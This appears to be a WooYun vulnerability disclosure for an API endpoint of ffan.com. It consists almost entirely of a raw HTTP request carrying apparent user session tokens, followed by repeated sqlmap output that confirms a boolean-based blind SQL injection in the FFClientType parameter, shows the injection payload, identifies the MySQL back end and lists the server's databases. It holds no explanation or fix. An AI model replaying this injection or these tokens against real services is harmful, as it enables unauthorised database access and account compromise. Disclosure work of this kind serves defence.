WooYun.org

GET http://api.ffan.com/ffan/v1/appskin/appSkins?FFClientType=1&FFClientVersion=32100000&FFUDID=15440&ddId=55&pLoginToken=bc5a89c493de&puid=7A3A3&size=750_1334&version=1&wdId=0f1cf59b3ff HTTP/1.1
Host: api.ffan.com
Accept: */*
Proxy-Connection: keep-alive
sqlmap resumed the following injection point(s) from stored session:
---
back-end DBMS: MySQL 5
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: FFClientType (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: FFClientType=1 AND 6831=6831&FFClientVersion=32100000&FFUDID=15000000068222440&ddId=ded10ed85e3c8af56018ad2f9b2f557a304d6155&pLoginToken=bc5ad73a25a6fb59e3a26fe289c493de&puid=7C325CCEC0484391953762A94DABA3A3&size=750_1334&version=1&wdId=9a100c5a595de2696d7670f1cf59b3ff
Vector: AND [INFERENCE]
---
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: FFClientType (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: FFClientType=1 AND 6831=6831&FFClientVersion=32100000&FFUDID=15000000068222440&ddId=ded10ed85e3c8af56018ad2f9b2f557a304d6155&pLoginToken=bc5ad73a25a6fb59e3a26fe289c493de&puid=7C325CCEC0484391953762A94DABA3A3&size=750_1334&version=1&wdId=9a100c5a595de2696d7670f1cf59b3ff
Vector: AND [INFERENCE]
---
back-end DBMS: MySQL >= 5.0.0
available databases [3]:
[*] ffan
[*] information_schema
[*] test